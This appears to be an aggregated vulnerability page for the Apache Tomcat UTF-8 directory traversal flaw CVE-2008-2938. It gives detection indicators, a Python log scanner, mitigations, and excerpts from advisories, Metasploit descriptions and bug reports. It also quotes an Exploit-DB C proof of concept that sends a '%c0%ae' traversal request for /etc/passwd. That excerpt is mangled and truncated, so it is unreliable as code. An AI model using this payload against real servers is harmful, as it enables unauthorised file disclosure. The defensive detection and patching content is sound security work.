CVE-2008-2938
Published: 2008-08-13
Priority: P3 · 50 · medium · 4.3 (CVSS 2.0) · AV:N/AC:M/Au:N/C:P/I:N/A:N
Exploit available
EPSS: 99.71% (100.0th percentile)
Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | tomcat | 4.0.0 – 4.1.37 | — |
| apache | tomcat | 5.0.0 – 5.5.26 | — |
| apache | tomcat | 6.0.0 – 6.0.16 | — |
Detection & IOCs
Bytes: %c0%ae%c0%ae (UTF-8 overlong encoding of '..')
- Detect HTTP requests containing the UTF-8 overlong-encoded directory traversal sequence %c0%ae%c0%ae (or %C0%AE%C0%AE) in the URI path, which represents an encoded '..' used to escape the web root.
- Alert on HTTP GET requests where the URI contains repeated occurrences of %c0%ae or %C0%AE (case-insensitive), especially targeting sensitive paths such as /etc/passwd or /WEB-INF/.
- The vulnerability is only exploitable when both 'allowLinking' is set to true AND 'URIEncoding' is set to UTF-8 in the Tomcat connector configuration. Audit server.xml and context.xml for these settings.
- The underlying flaw is in the JVM, not Tomcat itself. Vulnerable Java versions include Sun JRE prior to 1.4.2_19, 1.5.0_17, 6u11, and IBM Java prior to 5.0 SR9, 1.4.2 SR13, SE 6 SR4. Correlate Tomcat version with JVM version during triage.
- In Trend Micro DLP appliance deployments, the same %c0%ae traversal pattern applies; password hashes are stored in /etc/passwd (not /etc/shadow) and are anonymously accessible if vulnerable.
- The vulnerability is only triggered under a non-default configuration: both 'allowLinking' and 'URIEncoding=UTF-8' must be explicitly enabled in the Tomcat connector (server.xml or context.xml).
- Hot fix (without upgrading): disable allowLinking OR do not set URIEncoding to UTF-8. Either condition alone prevents exploitation.
- Affected version range per vendor advisory is Tomcat 4.1.0–4.1.37, 5.5.0–5.5.26, and 6.0.0–6.0.16; reports of 6.0.17 being affected are incorrect per the vendor.
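The log-side detection described in the list above, as an added Python example (not code from this page or from any of the sources it aggregates). It goes beyond the literal %c0%ae match by folding any two-byte overlong form of an ASCII character, so %c0%af ('/') is normalised as well; the log lines, their combined-log layout and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed access-log lines for illustration (documentation IP range).
SAMPLE_LOG = """\
192.0.2.10 - - [11/Aug/2008:10:00:01 +0000] "GET /index.jsp HTTP/1.1" 200 512
192.0.2.44 - - [11/Aug/2008:10:00:07 +0000] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.0" 200 1830
192.0.2.44 - - [11/Aug/2008:10:00:09 +0000] "GET /app/%C0%AE%C0%AE/WEB-INF/web.xml HTTP/1.0" 404 0
192.0.2.77 - - [11/Aug/2008:10:01:00 +0000] "GET /caf%c3%a9/menu.html HTTP/1.1" 200 90
"""

REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"[A-Z]+ (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def lenient_decode(uri):
    """Percent-decode the path, then fold two-byte overlong UTF-8 forms of
    ASCII (lead byte 0xC0 or 0xC1) back to ASCII, as a lax decoder would.
    Returns (decoded_path, overlong_count)."""
    raw = unquote_to_bytes(uri.split("?", 1)[0])
    out, i, overlong = bytearray(), 0, 0
    while i < len(raw):
        if raw[i] in (0xC0, 0xC1) and i + 1 < len(raw) and raw[i + 1] & 0xC0 == 0x80:
            out.append(((raw[i] & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            overlong += 1
            i += 2
        else:
            out.append(raw[i])
            i += 1
    return out.decode("utf-8", errors="replace"), overlong

def scan(log_text):
    """Return one finding per request whose path contains overlong bytes."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        path, overlong = lenient_decode(m["uri"])
        if overlong:
            findings.append({"client": m["client"], "status": int(m["status"]),
                             "path": path, "traversal": ".." in path.split("/")})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `traversal` true and status 200 is the one to triage first, since the response may have carried file contents; legitimate multi-byte UTF-8 such as %c3%a9 is never flagged because valid UTF-8 does not use lead bytes 0xC0 or 0xC1.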
CVSS provenance
nvd · v2.0 · 4.3 MEDIUM · AV:N/AC:M/Au:N/C:P/I:N/A:N
ghsa · 5.0 MEDIUM
osv · 5.0 MEDIUM
vendor_redhat · 5.0 MEDIUM
Red Hat
tomcat Unicode directory traversal vulnerability
vendor_redhat·2008-08-11·CVSS 5.0
OSV
Apache Tomcat Directory Traversal vulnerability
osv·2022-05-01·CVSS 5.0
GHSA
Apache Tomcat Directory Traversal vulnerability
ghsa·2022-05-01·CVSS 5.0
CVE-2008-2938 [MEDIUM] CWE-22 Apache Tomcat Directory Traversal vulnerability
No detection rules found.
Exploit-DB
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal
exploitdb·2010-07-28
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define EXPLOIT "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.0\n\n"
#define RCVBUFSIZE 9999
#define tester "root:x"
void cls()
{
char esc = 27;
printf("%c%s",esc,"[2J");
printf("%c%s",esc,"[1;1H");
}
int main(int argc,char **argv)
{
if(argch_addr);
memset(&(their_addr.sin_zero), '\0', 8);
if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
{
perror("failed to connect !!!");
}
else
{
printf("\n[+]Port 80 opens !!! now sending your exploit to our target\n");
if(send(sockfd, EXPLOIT,999,0)==-1)
{
perror ("send");
}
else
{
totalbytes=0;
while (totalbytes < RCVBUFSIZE)
{
if ((bytesrcv = recv(sockfd, echobuf, RCVBUFSIZE - 1, 0)) <= 0)
{
}
els
Exploit-DB
toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities
exploitdb·2009-11-07
CVE-2009-4849 toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities
---
Secure Network - Security Research Advisory
Vuln name: ToutVirtual VirtualIQ Pro Multiple Vulnerabilities
Systems affected: ToutVirtual VirtualIQ Professional 3.2 build 7882
Systems not affected: --
Severity: High
Local/Remote: Remote
Vendor URL: http://www.toutvirtual.com
Author(s): Alberto Trivero (a.trivero (at) securenetwork (dot) it)
Claudio Criscione (c.criscione (at) securenetwork (dot) it)
Vendor disclosure: 02/07/2009
Vendor acknowledged: 16/07/2009
Vendor patch release: notified us on 06/11/2009
Public disclosure: 07/11/2009
Advisory number: SN-2009-02
Advisory URL: http://www.securenetwork.it/advisories/sn-2009-02.txt
*** SUMMARY ***
ToutVirtual's VirtualIQ Pro is speci
Exploit-DB
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)
exploitdb·2008-08-11·CVSS 4.3
CVE-2008-2938 [MEDIUM] Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)
---
Title: Apache Tomcat Directory Traversal Vulnerability
Author: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com)
Severity: High
Impact: Remote File Disclosure
Vulnerable Version: prior to 6.0.18
Solution:
- Best Choice: Upgrade to 6.0.18 (http://tomcat.apache.org)
- Hot fix: Disable allowLinking or do not set URIencoding to utf8 in order to avoid this vulnerability.
- Tomcat 5.5.x and 4.1.x Users: The fix will be included in the next releases. Please apply the hot fix until next release.
References:
- http://tomcat.apache.org/security.html
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938
History:
- 07.17.2008: Initiate notify (To Apache Security Team)
- 08.02.2008: Responded this problem fixed and released
Metasploit
Tomcat UTF-8 Directory Traversal Vulnerability
metasploit
This module tests whether a directory traversal vulnerability is present in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0 - 6.0.16 under specific and non-default installations. The connector must have allowLinking set to true and URIEncoding set to UTF-8. Furthermore, the vulnerability actually occurs within Java and not Tomcat; the server must use Java versions prior to Sun 1.4.2_19, 1.5.0_17, 6u11 - or prior IBM Java 5.0 SR9, 1.4.2 SR13, SE 6 SR4 releases. This module has only been tested against RedHat 9 running Tomcat 6.0.16 and Sun JRE 1.5.0-05. You may wish to change FILE (hosts,sensitive files), MAXDIRS and RPORT depending on your environment.
Metasploit
TrendMicro Data Loss Prevention 5.5 Directory Traversal
metasploit
This module tests whether a directory traversal vulnerability is present in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294. The vulnerability appears to be actually caused by the Tomcat UTF-8 bug which is implemented in module tomcat_utf8_traversal CVE 2008-2938. This module simply tests for the same bug with Trend Micro specific settings. Note that in the Trend Micro appliance, /etc/shadow is not used and therefore password hashes are stored and anonymously accessible in the passwd file.
arXiv
ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks
arxiv_fulltext·2019-05-29
## Abstract
Despite the fact that cyberattacks are constantly growing in complexity, the research community still lacks effective tools to easily monitor and understand them.
In particular, there is a need for techniques that are able to not only track how prominently certain malicious actions, such as the exploitation of specific vulnerabilities, are exploited in the wild, but also (and more importantly) how these malicious actions factor in as attack steps in more complex cyberattacks.
In this paper we present ATTACK2VEC, a system that uses temporal word embeddings to model how attack steps are exploited in the wild, and track how they evolve.
We test ATTACK2VEC on a dataset of billions of security events collected from the c
Bugzilla
CVE-2008-2938 tomcat Unicode directory traversal vulnerability
bugzilla·2008-07-21·CVSS 4.3
Tomcat allows remote attackers to access local resources via directory
traversal, iff the following two modifications have been applied
- URIEncoding in server.xml (tag Connector) is set to "UTF-8"
- allowLinking in context.xml (tag Context) is set to "true"
Discussion:
tomcat6-6.0.18-1.1.fc9 has been submitted as an update for Fedora 9.
http://admin.fedoraproject.org/updates/tomcat6-6.0.18-1.1.fc9
---
tomcat6-6.0.18-1.1.fc9 has been pushed to the Fedora 9 stable repository. If problems still persist, please make note of it in this bug report.
---
tomcat5-5.5.27-0jpp.1.fc8 has been submitted as an update for Fedora 8.
http://admin.fedoraproject.org/updates/tomcat5-5.5.27-0jpp.1.fc8
---
tomcat5-5.5.27-0jpp.2.fc9 has bee